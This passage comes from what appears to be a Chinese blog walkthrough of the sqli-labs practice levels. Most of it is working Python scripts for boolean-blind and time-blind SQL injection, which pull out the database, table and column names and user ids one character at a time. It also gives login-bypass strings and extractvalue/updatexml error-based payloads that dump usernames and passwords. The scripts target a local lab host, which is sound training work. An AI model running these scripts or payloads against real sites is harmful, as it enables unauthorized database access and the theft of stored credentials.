<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_database_length2</span>(<span class="params">database_length</span>):</span><br><span class="line">    <span class="keyword">global</span> flag, url</span><br><span class="line">    database = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, database_length + <span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">65</span>,<span class="number">122</span>):</span><br><span class="line">            payload = <span class="string">f&quot;?id=1&#x27; and ascii(substr((select database()),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>--+&quot;</span></span><br><span class="line">            response = requests.get(url + payload).text</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> response:</span><br><span class="line">                database += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;数据库名为&quot;</span>,database)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> database</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取数据库长度&quot;</span>)</span><br><span class="line">    length = get_database_length()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取数据库名&quot;</span>)</span><br><span class="line">    length_name = get_database_length2(length)</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;遍历出数据库名security，那么其他同理，只要将payload改一下下就可以了。判断表长度</p>
<figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">def get_table_<span class="meta">length</span>():</span><br><span class="line">    global flag, url</span><br><span class="line">    <span class="keyword">length</span> = 1</span><br><span class="line">    <span class="keyword">while</span>(1):</span><br><span class="line">        payload = f<span class="string">&quot;?id=1&#x27;and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=&#123;length&#125;--+&quot;</span></span><br><span class="line">        response = requests.get(url + payload).text</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">not</span> <span class="keyword">in</span> response:</span><br><span class="line">            <span class="keyword">length</span> += 1</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            pr<span class="meta">int</span>(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">            break</span><br><span class="line">    pr<span class="meta">int</span>(<span class="string">&quot;表长度为&quot;</span>,<span class="keyword">length</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">length</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    pr<span class="meta">int</span>(<span class="string">&quot;获取数据库长度&quot;</span>)</span><br><span class="line">    <span class="keyword">length</span> = get_database_<span class="meta">length</span>()</span><br><span class="line">    pr<span class="meta">int</span>(<span class="string">&quot;获取数据库名&quot;</span>)</span><br><span class="line">    length_name = get_database_length2(<span class="keyword">length</span>)</span><br><span class="line">    pr<span class="meta">int</span>(<span class="string">&quot;获取表长度&quot;</span>)</span><br><span class="line">    table_length = get_table_<span class="meta">length</span>()</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;跟获取数据库长度是一样的，注意payload就行，得出表长度为29，下一步表名，老样子，改payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_table_name</span>(<span class="params">table_length</span>):</span><br><span class="line">    <span class="keyword">global</span> flag, url</span><br><span class="line">    table_name = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, table_length + <span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">122</span>):</span><br><span class="line">            payload = <span class="string">f&quot;?id=1&#x27;and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>--+&quot;</span></span><br><span class="line">            response = requests.get(url + payload).text</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> response:</span><br><span class="line">                table_name += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;表名为&quot;</span>,table_name)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> table_name</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取数据库长度&quot;</span>)</span><br><span class="line">    length = get_database_length()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取数据库名&quot;</span>)</span><br><span class="line">    length_name = get_database_length2(length)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取表长度&quot;</span>)</span><br><span class="line">    table_length = get_table_length()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取表名&quot;</span>)</span><br><span class="line">    table_name = get_table_name(table_length)</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;获取表名为emails,referers,uagents,users，<font color=blue>细节3:因为表名不止一个，中间的分隔符,我们可以把ASCII的范围调到33-127</font>如果觉得运行较慢的话，可以使用算法加工，例如二分法,或者把获取到的信息注释掉。下一步，爆列。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_column_length</span>():</span><br><span class="line">    <span class="keyword">global</span> flag,url</span><br><span class="line">    length = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span>(<span class="literal">True</span>):</span><br><span class="line">        payload = <span class="string">f&quot;?id=1&#x27;and length((select group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;))=<span class="subst">&#123;length&#125;</span>--+&quot;</span></span><br><span class="line">        response = requests.get(url + payload).text</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">not</span> <span class="keyword">in</span> response:</span><br><span class="line">            length += <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;表长度为&quot;</span>, length)</span><br><span class="line">    <span class="keyword">return</span> length</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_column_name</span>(<span class="params">column_length</span>):</span><br><span class="line">    <span class="keyword">global</span> flag,url</span><br><span class="line">    column_name = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, column_length + <span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">122</span>):</span><br><span class="line">            payload = <span class="string">f&quot;?id=1&#x27;and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>--+&quot;</span></span><br><span class="line">            response = requests.get(url + payload).text</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> response:</span><br><span class="line">                column_name += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;表名为&quot;</span>,column_name)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> column_name</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取数据库长度&quot;</span>)</span><br><span class="line">    length = get_database_length()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取数据库名&quot;</span>)</span><br><span class="line">    length_name = get_database_length2(length)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取表长度&quot;</span>)</span><br><span class="line">    table_length = get_table_length()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取表名&quot;</span>)</span><br><span class="line">    table_name = get_table_name(table_length)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取列长度&quot;</span>)</span><br><span class="line">    column_length = get_column_length()</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取列名&quot;</span>)</span><br><span class="line">    column_name = get_column_name(column_length)</span><br></pre></td></tr></table></figure>
<p><img data-src="/images/sql/sql5-column.png" alt="sql5-column"><br>&emsp;&emsp;最后爆字段</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_column_id</span>():</span><br><span class="line">    <span class="keyword">global</span> flag,url</span><br><span class="line">    length = <span class="number">1</span></span><br><span class="line">    <span class="built_in">id</span> = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span>(<span class="literal">True</span>):</span><br><span class="line">        payload = <span class="string">f&quot;?id=1&#x27;and length((select group_concat(id) from users))=<span class="subst">&#123;length&#125;</span>--+&quot;</span></span><br><span class="line">        response = requests.get(url + payload).text</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">not</span> <span class="keyword">in</span> response:</span><br><span class="line">            length += <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;id长度为&quot;</span>,length)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,length+<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">122</span>):</span><br><span class="line">            payload = <span class="string">f&quot;?id=1&#x27;and ascii(substr((select group_concat(id) from users),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>--+&quot;</span></span><br><span class="line">            response = requests.get(url + payload).text</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> response:</span><br><span class="line">                <span class="built_in">id</span> += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;id为&quot;</span>,<span class="built_in">id</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">id</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="comment"># print(&quot;获取数据库长度&quot;)</span></span><br><span class="line">    <span class="comment"># length = get_database_length()</span></span><br><span class="line">    <span class="comment"># print(&quot;获取数据库名&quot;)</span></span><br><span class="line">    <span class="comment"># length_name = get_database_length2(length)</span></span><br><span class="line">    <span class="comment"># print(&quot;获取表长度&quot;)</span></span><br><span class="line">    <span class="comment"># table_length = get_table_length()</span></span><br><span class="line">    <span class="comment"># print(&quot;获取表名&quot;)</span></span><br><span class="line">    <span class="comment"># table_name = get_table_name(table_length)</span></span><br><span class="line">    <span class="comment"># print(&quot;获取列长度&quot;)</span></span><br><span class="line">    <span class="comment"># column_length = get_column_length()</span></span><br><span class="line">    <span class="comment"># print(&quot;获取列名&quot;)</span></span><br><span class="line">    <span class="comment"># column_name = get_column_name(column_length)</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;获取字段&quot;</span>)</span><br><span class="line">    <span class="built_in">id</span> = get_column_id()</span><br></pre></td></tr></table></figure>
<p><img data-src="/images/sql/sql5-id.png" alt="sql5-id"></p>
<h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><p>&emsp;&emsp;当做到第九关的时候，测试闭合符不管输入什么页面显示的东西都是一样的，这个时候就得考虑时间盲注了，我们就可以使用sleep()来使页面延迟，从而肉眼分辨真假，时间盲注和布尔盲注两种没有多大的区别，只不过时间盲注多了<font color=red>if和sleep函数</font>,if(a,sleep(3),1)如果a结果为true，那么执行sleep(3)页面延迟10秒，反之执行1，无延迟。<br>&emsp;&emsp;测试是否可以执行时间盲注的方法，判断闭合符的方法也是一样的，修改1&#x3D;1，如果假和真都无延迟就说明是闭合符的问题，一般只要真有延迟就说明闭合符正确，</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attribute">id</span>=1&#x27; <span class="keyword">and</span> <span class="keyword">if</span>(<span class="attribute">1</span>=1,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;行，既然知道了，那么大致的payload应该也就出来了。既然有延迟，就说明浏览器的timeout就会有增加，我们就只需要调整一下布尔函数的py就可以了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&#x27;http://sql-labs:3601/Less-9/&#x27;</span>  <span class="comment"># 目标URL</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_database_length</span>():</span><br><span class="line">    <span class="keyword">global</span> url  <span class="comment"># 全局变量</span></span><br><span class="line">    length = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>):</span><br><span class="line">        payload = <span class="string">f&quot;?id=1&#x27; and if(length((select database()))=<span class="subst">&#123;length&#125;</span>,sleep(3),1)--+&quot;</span></span><br><span class="line">        <span class="keyword">try</span>:  <span class="comment">#try-except 块捕获任何可能的异常，如网络超时或连接错误。</span></span><br><span class="line">            response = requests.get(url + payload,timeout=<span class="number">3</span>).text <span class="comment">#设置超时</span></span><br><span class="line">        <span class="keyword">except</span> Exception:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;success&quot;</span>)  <span class="comment">#如果超时了说明正确，返回success</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            length += <span class="number">1</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;数据库长度为&quot;</span>, length)</span><br><span class="line">    <span class="keyword">return</span> length</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;通过try-except获取超时的信息，从而判断出数据库的长度。<br><img data-src="/images/sql/sql9-time1.png" alt="sql9-time1"><br>&emsp;&emsp;那么同理加if和try-except以及timeout从布尔盲注的脚本进行修改就可以取出数据库名。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_database_length2</span>(<span class="params">database_length</span>):</span><br><span class="line">    <span class="keyword">global</span> url</span><br><span class="line">    database = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, database_length + <span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">65</span>,<span class="number">122</span>):</span><br><span class="line">            payload = <span class="string">f&quot;?id=1&#x27; and if(ascii(substr((select database()),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>,sleep(3),1)--+&quot;</span></span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                response = requests.get(url + payload,timeout=<span class="number">3</span>).text</span><br><span class="line">            <span class="keyword">except</span> Exception:</span><br><span class="line">                database += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;数据库名为&quot;</span>,database)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> database</span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;其余的跟这两种的修改方案一样，我就不一一放出来了，最终可以得到字段<br><img data-src="/images/sql/sql9-time2.png" alt="sql9-time2"></p>
<h2 id="post请求"><a href="#post请求" class="headerlink" title="post请求"></a>post请求</h2><h3 id="联合注入-1"><a href="#联合注入-1" class="headerlink" title="联合注入"></a>联合注入</h3><p>&emsp;&emsp;做到第十一关，请求方式变为了post请求，变成了更为常见的类型，要求输入用户名和密码，那么大概的sql语句就是username&#x3D;[] and password&#x3D;[],我们也可以测试闭合符看报错（如果有的话）。<br><img data-src="/images/sql/sql11-post.png" alt="sql11-post"><br>&emsp;&emsp;如果我们输入闭合符有报错的，就说明有回显，就可以利用联合注入。<br><img data-src="/images/sql/sql11-1.png" alt="sql11-1"><br>&emsp;&emsp;报错的这段我们分析一下就知道为单引号闭合，我们输入1’是后面闭合变成了双引号，那么就改变了原语句而报错。没分析明白的再去看看基础。<br>&emsp;&emsp;知道了sql语句我们就可以构造一个恒成立的sql语句，也成为万能密码，具体可转至<a target="_blank" rel="noopener" href="https://blog.csdn.net/hxhxhxhxx/article/details/108020010">万能密码</a><br>&emsp;&emsp;我用的是<font color=red>1’ or 1&#x3D;1# </font>这个得根据语句进行判断，实在不知道就用BP爆破，这里post请求用的注释符通常用#，具体原因我也不知道，谁懂了可以举个爪。<br><img data-src="/images/sql/sql11-2.png" alt="sql11-2"><br>&emsp;&emsp;条件达成，联合注入即可。</p>
<h3 id="布尔盲注-1"><a href="#布尔盲注-1" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><p>&emsp;&emsp;注入成功有页面变化无回显，可以使用布尔盲注，只不过这是post请求的，对应的脚本也需要修改。<font color>细节:回显成功的参数是个图片，ctrl+U能收集到信息参数</font><br><img data-src="/images/sql/sql13-post.png" alt="sql13-post"></p>
<figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">url = <span class="string">&#x27;http://sql-labs:3601/Less-13/&#x27;</span>  <span class="meta"># 目标URL</span></span><br><span class="line">flag = <span class="string">&quot;../images/flag.jpg&quot;</span>  <span class="meta"># 设置一个回显成功的字样</span></span><br><span class="line">data= &#123;</span><br><span class="line">    <span class="string">&quot;uname&quot;</span> : <span class="string">&quot;a&#x27;) or 1 #&quot;</span>,</span><br><span class="line">    <span class="string">&quot;passwd&quot;</span> : <span class="string">&quot;1&quot;</span>,</span><br><span class="line">    <span class="string">&quot;submit&quot;</span> : <span class="string">&quot;Submit&quot;</span></span><br><span class="line">&#125; <span class="meta">#post参数</span></span><br><span class="line"></span><br><span class="line">def get_database_length():</span><br><span class="line">    global url, flag  <span class="meta"># 全局变量</span></span><br><span class="line">    <span class="keyword">length</span> = <span class="number">1</span></span><br><span class="line">    <span class="keyword">while</span> (<span class="number">1</span>):</span><br><span class="line">        payload = f<span class="string">&quot;1&#x27;) or length((select database()))=&#123;length&#125;#&quot;</span></span><br><span class="line">        data[<span class="string">&quot;uname&quot;</span>] = payload</span><br><span class="line">        response = requests.post(url, data=data).text</span><br><span class="line">        <span class="keyword">if</span> flag <span class="keyword">not</span> in response:</span><br><span class="line">            <span class="keyword">length</span> += <span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">print</span>(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">print</span>(<span class="string">&quot;数据库长度为&quot;</span>, <span class="keyword">length</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">length</span></span><br></pre></td></tr></table></figure>
<p>&emsp;&emsp;照着修改一下即可。剩下的也是一样的，测长和字符的形式是一样，我就例举两个就行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">get_database_length2</span>(<span class="params">database_length</span>):</span><br><span class="line">    <span class="keyword">global</span> flag, url</span><br><span class="line">    database = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, database_length + <span class="number">1</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">65</span>,<span class="number">122</span>):</span><br><span class="line">            payload = <span class="string">f&quot;1&#x27;) or ascii(substr((select database()),<span class="subst">&#123;i&#125;</span>,1))=<span class="subst">&#123;j&#125;</span>#&quot;</span></span><br><span class="line">            data[<span class="string">&quot;uname&quot;</span>] = payload</span><br><span class="line">            response = requests.post(url,data=data).text</span><br><span class="line">            <span class="keyword">if</span> flag <span class="keyword">in</span> response:</span><br><span class="line">                database += <span class="built_in">chr</span>(j)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&quot;数据库名为&quot;</span>,database)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">return</span> database</span><br></pre></td></tr></table></figure>

<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>&emsp;&emsp;第十七关是一个密码重置界面，用户名已经找到，密码不知道，这一题还对用户名进行了检查，就只能对密码入手，如果布尔盲注和时间盲注都不能使用，就可以使用报错注入。就直接给固定公式了，原理可以再去搜索一下。</p>
<h4 id="extractvalue报错注入"><a href="#extractvalue报错注入" class="headerlink" title="extractvalue报错注入"></a>extractvalue报错注入</h4><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1&#x27;</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,concat(<span class="number">0x5c</span>,version(),<span class="number">0x5c</span>)))<span class="meta">#    爆版本</span></span><br><span class="line"><span class="number">1&#x27;</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,concat(<span class="number">0x5c</span>,database(),<span class="number">0x5c</span>)))<span class="meta">#   爆数据库</span></span><br><span class="line"> </span><br><span class="line"><span class="number">1&#x27;</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="function"><span class="keyword">select</span> <span class="title">group_concat</span>(<span class="params">table_name</span>) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema</span>=database()),<span class="number">0x5c</span>)))<span class="meta">#   爆表名</span></span><br><span class="line"><span class="number">1&#x27;</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="function"><span class="keyword">select</span> <span class="title">group_concat</span>(<span class="params">column_name</span>) <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema</span>=database() <span class="keyword">and</span> table_name=<span class="string">&#x27;users&#x27;</span>),<span class="number">0x5c</span>)))<span class="meta"># </span></span><br><span class="line"> 爆字段名</span><br><span class="line"> </span><br><span class="line"><span class="number">1&#x27;</span> <span class="keyword">and</span> (extractvalue(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="function"><span class="keyword">select</span> password <span class="title">from</span> (<span class="params"><span class="keyword">select</span> password <span class="keyword">from</span> users <span class="keyword">where</span> username=<span class="string">&#x27;admin1&#x27;</span></span>) b) ,0x5c)))#      爆字段内容该格式针对mysql数据库。</span></span><br><span class="line"><span class="function">1&#x27; <span class="title">and</span> (<span class="params">extractvalue(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="keyword">select</span> group_concat(username,password</span>) <span class="keyword">from</span> users),0x5c)))#                      爆字段内容。</span></span><br></pre></td></tr></table></figure>

<h4 id="updatexml报错注入"><a href="#updatexml报错注入" class="headerlink" title="updatexml报错注入"></a>updatexml报错注入</h4><figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">123&#x27;</span> <span class="keyword">and</span> (updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,version(),<span class="number">0x5c</span>),<span class="number">1</span>))<span class="meta">#     爆版本</span></span><br><span class="line"><span class="number">123&#x27;</span> <span class="keyword">and</span> (updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,database(),<span class="number">0x5c</span>),<span class="number">1</span>))<span class="meta">#    爆数据库</span></span><br><span class="line"> </span><br><span class="line">  </span><br><span class="line"><span class="number">123&#x27;</span> <span class="keyword">and</span> (updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="function"><span class="keyword">select</span> <span class="title">group_concat</span>(<span class="params">table_name</span>) <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema</span>=database()),<span class="number">0x5c</span>),<span class="number">1</span>))<span class="meta">#      爆表名</span></span><br><span class="line"><span class="number">123&#x27;</span> <span class="keyword">and</span> (updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(<span class="function"><span class="keyword">select</span> <span class="title">group_concat</span>(<span class="params">column_name</span>) <span class="keyword">from</span> information_schema.columns <span 